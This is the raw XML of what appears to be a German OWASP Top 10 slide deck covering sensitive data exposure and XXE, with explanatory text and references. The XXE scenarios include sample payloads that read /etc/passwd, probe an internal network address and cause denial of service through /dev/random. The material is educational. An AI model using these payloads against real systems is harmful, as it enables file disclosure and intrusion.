                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-Force aufgebrochen werden.</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de-DE" sz="900" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>In den letzten Jahren war dies die Angriffsart, die am häufigsten wirksam</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>war. Fehlende Verschlüsselung vertraulicher Daten </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ist hierbei </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>die häufigste Schwach-stelle. Das Nutzen von Kryptographie erfolgt oft mit schwacher Schlüsselerzeugung und -verwaltung und der Nutzung schwacher Algorithmen, Protokolle und Verfahren (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Cipher</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>) insbesondere für Passwort-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Hashes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Server-Schwachstellen bei der Transport-verschlüsselung können einfach erkannt werden, hingegen ist dies für gespeicherte Daten schwierig.</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de-DE" sz="900" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Fehler kompromittieren regelmäßig alle vertraulichen Daten. Es handelt sich hierbei oft </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>auch um sensible </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>personenbezogene Daten wie Patienten-, Personal-, Login-Daten</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>oder Kreditkarteninformationen,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> die aufgrund gesetzlicher oder </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" baseline="0" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>regulato-rischen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Vorgaben zu schützen sind, wie z.B. die </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>DSGVO</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> der EU oder nationale Datenschutz-Gesetze.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="2880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Mögliche Angriffsszenarien</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Zahlreiche öffentliche XXE-Probleme wurden entdeckt, darunter auch Angriffe auf Embedded-Geräte. XXE tritt an vielen unerwarteten Stellen auf, einschließlich tief verschachtelter Abhängigkeiten. Der einfachste Weg, wenn möglich, ist das Hochladen einer bösartigen XML-Datei:</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Szenario 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Der Angreifer versucht, Daten vom Server zu extrahieren:</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  &lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;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&lt;!DOCTYPE foo [</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&lt;!ELEMENT foo ANY &gt;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"file:///etc/passwd" &gt;]&gt;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&lt;foo&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;&lt;/foo&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Szenario 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Ein Angreifer durchsucht das private Netzwerk des Servers, indem er die obige ENTITY-Zeile ändert zu:</a:t>
            </a:r>
          </a:p>
          <a:p>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"https://192.168.1.1/private" &gt;]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Szenario 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Ein Angreifer versucht einen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Denial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-Service-Angriff, indem er eine potenziell endlose Datei einfügt:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   &lt;!ENTITY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"file:///dev/random" &gt;]&gt;</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Ist die Anwendung verwundbar?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Anwendungen und insbesondere XML-basierte Webservices oder nachgelagerte Integrationen können in folgenden Fällen anfällig für Angriffe sein:</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="14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a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Die Anwendung akzeptiert direkt XML oder XML-Uploads, insbesondere aus nicht vertrauenswürdigen Quellen oder fügt nicht vertrauenswürdige Daten in XML-Dokumente ein, die dann von einem XML-Prozessor analysiert werden.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Die XML-Prozessoren in der Anwendung oder SOAP-basierte Webservices haben </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t> Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Definitions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t> (DTDs)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> aktiviert. Da der genaue Mechanismus zum Deaktivieren der DTD-Verarbeitung je nach Prozessor variiert, ist es empfehlenswert, eine Referenz wie den </a:t>
            </a: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r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>zu konsultieren.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Wenn Ihre Anwendung SAML für die Identitätsverarbeitung im Rahmen von föderierter Sicherheit oder für Single </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> On (SSO) Zwecke verwendet. SAML verwendet XML für Identitätsbekundungen und kann daher anfällig sein.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Wenn die Anwendung SOAP vor Version 1.2 verwendet, ist sie wahrscheinlich anfällig für XXE-Angriffe, wenn XML-Entitäten an das SOAP-Framework übergeben werden.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Die Anfälligkeit für XXE-Angriffe bedeutet wahrscheinlich, dass die Anwendung anfällig für </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Denial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-Service-Angriffe, einschließlich des sogenannten "Billion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Laughs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>" Angriffs, ist.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId6"/>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a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Referenzen</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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>OWASP Application Security Verification Standard</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Testing Guide: Testing for XML Injection</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OWASP XXE Vulnerability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Cheat Sheet: XML Security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endParaRPr lang="en-US" sz="900"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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Andere</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId11"/>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CWE-611: Improper Restriction of XXE</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Billion Laughs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SAML Security XML External Entity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Detecting and exploiting XXE in SAML Interfaces</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Wie kann ich das verhindern?</a:t>
